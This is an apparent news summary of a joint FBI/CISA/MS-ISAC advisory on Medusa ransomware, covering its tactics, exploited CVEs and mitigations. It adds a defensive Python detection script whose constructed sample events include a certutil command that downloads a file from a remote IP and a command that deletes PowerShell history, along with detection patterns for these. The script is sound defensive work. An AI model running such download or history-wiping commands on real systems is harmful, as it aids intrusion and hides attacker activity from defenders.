Medusa Ransomware Operation Impacted Over 300 Critical Infrastructure Organizations Until February 2025
Through February 2025, the Medusa ransomware operation has hit a large number of critical infrastructure organizations in the United States. The FBI, CISA, and MS-ISAC have issued a joint advisory detailing the tactics, techniques, and indicators of compromise (IOCs) used by the Medusa threat actors.
The Medusa ransomware variant is a type of ransomware-as-a-service (RaaS) that was first identified in June 2021. As of February 2025, Medusa developers and affiliates have impacted over 300 victims from various critical infrastructure sectors, including medical, education, legal, insurance, technology, and manufacturing. The affected industries are listed below:
* Medical
* Education
* Legal
* Insurance
* Technology
* Manufacturing
The Medusa ransomware operation is distinct from other malware families that share the name, such as MedusaLocker and the Medusa mobile malware.
Medusa Ransomware Tactics and Techniques
According to the joint advisory, Medusa threat actors recruit initial access brokers (IABs) through cybercriminal forums, offering payments ranging from $100 to $1 million. The group's affiliates gain access to victims by using phishing campaigns to steal credentials and exploiting unpatched software vulnerabilities.
The Medusa operators use living off the land (LOTL) techniques and legitimate tools like Advanced IP Scanner and SoftPerfect Network Scanner for reconnaissance. After gaining a foothold, they scan for exposed services such as FTP, SSH, HTTP, SQL databases, and RDP, and they enumerate the network and filesystem using PowerShell and the Windows Command Prompt.
Additionally, the operators query system information through Windows Management Instrumentation (WMI). Medusa actors use LOTL techniques to evade detection and employ certutil.exe for stealthy file ingress. The experts also observed the operators deleting PowerShell command history to cover their tracks.
The researchers report that the operators rely on Ligolo for reverse tunneling and on Cloudflared to expose systems without direct internet exposure. Medusa operators leverage legitimate remote access tools like AnyDesk, Atera, and Splashtop, alongside RDP and PsExec, to move laterally and locate files for exfiltration and encryption.
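The tradecraft above (certutil.exe file ingress, PowerShell history deletion, scanners, tunnelers and remote access tools) is all visible in ordinary process-creation telemetry. The following is an added example, not code from the advisory or from CISA, that runs simple detection logic over a handful of constructed Sysmon-style process events. The executable names in the tool table (for instance netscan.exe for SoftPerfect Network Scanner, srservice.exe for Splashtop, ligolo.exe for a Ligolo agent) are assumptions to be tuned to the names actually observed in your environment; the PSReadLine history file name is the real default location of PowerShell command history.

```python
"""Added example: flag Medusa-style LOTL and tool usage in process-creation logs.
All sample events below are constructed for this demonstration, not real telemetry."""
from __future__ import annotations

import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    image: str          # full path of the executable that was started
    command_line: str


# Constructed sample telemetry in the shape of Sysmon Event ID 1 (process creation).
SAMPLE_EVENTS = [
    ProcessEvent("WS01", r"CORP\jdoe", r"C:\Windows\System32\svchost.exe",
                 "svchost.exe -k netsvcs"),
    ProcessEvent("WS01", r"CORP\jdoe", r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://198.51.100.7/u.bin C:\Users\Public\u.bin"),
    ProcessEvent("WS01", r"CORP\jdoe", r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c del %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"),
    ProcessEvent("SRV02", r"CORP\svc_backup", r"C:\Users\Public\cloudflared.exe",
                 "cloudflared.exe tunnel run"),
    ProcessEvent("SRV02", r"CORP\svc_backup", r"C:\Users\Public\netscan.exe",
                 "netscan.exe"),
    ProcessEvent("WS03", r"CORP\helpdesk", r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
                 "AnyDesk.exe --service"),
]

# Executables associated with the tradecraft described in the advisory. The exact
# file names are assumptions (attackers also rename binaries), so treat this as a
# starting point rather than an authoritative list.
TOOL_CATEGORIES = {
    "advanced_ip_scanner.exe": "network-scanner",
    "netscan.exe": "network-scanner",          # SoftPerfect Network Scanner (assumed name)
    "anydesk.exe": "remote-access-tool",
    "ateraagent.exe": "remote-access-tool",    # Atera agent (assumed name)
    "srservice.exe": "remote-access-tool",     # Splashtop streamer (assumed name)
    "psexec.exe": "remote-execution",
    "psexesvc.exe": "remote-execution",
    "cloudflared.exe": "tunneling",
    "ligolo.exe": "tunneling",                 # hypothetical name for a Ligolo agent
}

# certutil switches that fetch or decode a file (the "file ingress" use of certutil).
CERTUTIL_INGRESS = re.compile(r"-(urlcache|decode|encode)\b", re.I)
# PSReadLine keeps PowerShell command history in this file by default.
PS_HISTORY = re.compile(r"ConsoleHost_history\.txt", re.I)
DELETE_VERB = re.compile(r"\b(del|erase|rm|remove-item|ri)\b", re.I)


def classify(event: ProcessEvent) -> list[str]:
    """Return the detection tags that apply to a single process-creation event."""
    name = PureWindowsPath(event.image).name.lower()
    tags: list[str] = []
    if name == "certutil.exe" and CERTUTIL_INGRESS.search(event.command_line):
        tags.append("certutil-file-ingress")
    if PS_HISTORY.search(event.command_line) and DELETE_VERB.search(event.command_line):
        tags.append("powershell-history-deletion")
    if name in TOOL_CATEGORIES:
        tags.append(TOOL_CATEGORIES[name])
    return tags


def scan(events: list[ProcessEvent]) -> list[tuple[str, str, str, str]]:
    """Return (host, user, image basename, tag) for every event that matched a rule."""
    findings = []
    for ev in events:
        for tag in classify(ev):
            findings.append((ev.host, ev.user, PureWindowsPath(ev.image).name, tag))
    return findings


def hosts_with_stacked_signals(findings, threshold: int = 2) -> list[str]:
    """Hosts on which several distinct categories were seen. A scanner plus a tunnel
    on one host is far more telling than either tool alone, which helps keep the
    legitimate-tool matches (AnyDesk used by the help desk) from drowning out the rest."""
    by_host: dict[str, set[str]] = {}
    for host, _user, _image, tag in findings:
        by_host.setdefault(host, set()).add(tag)
    return sorted(h for h, tags in by_host.items() if len(tags) >= threshold)


if __name__ == "__main__":
    results = scan(SAMPLE_EVENTS)
    for finding in results:
        print(finding)
    print("hosts with stacked signals:", hosts_with_stacked_signals(results))
```

A single match on a legitimate remote access tool is not evidence of compromise on its own; the value of the tool table is in correlating it with the LOTL signals (certutil ingress, history deletion) on the same host and with whether the tool is one your organization actually sanctions.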
Medusa Ransomware Indicators of Compromise (IOCs) and Mitigations
The FBI investigations identified several indicators of compromise (IOCs) used by the Medusa threat actors:
* Targeted CVE-2024-1709 (ScreenConnect authentication bypass)
* Exploited CVE-2023-48788 (Fortinet EMS SQL injection)
* Utilized living off the land (LOTL) techniques
* Employed legitimate tools like Advanced IP Scanner and SoftPerfect Network Scanner for reconnaissance activity
To mitigate these threats, the following measures can be taken:
* Regularly update software and systems to patch known vulnerabilities.
* Implement strong security controls, including intrusion detection and prevention systems.
* Use legitimate remote access tools and ensure they are properly configured and monitored.
* Conduct regular backups and test them to ensure recoverability.
By understanding the tactics, techniques, and indicators of compromise used by Medusa ransomware threat actors, organizations can take proactive steps to prevent attacks and minimize the impact of a potential breach.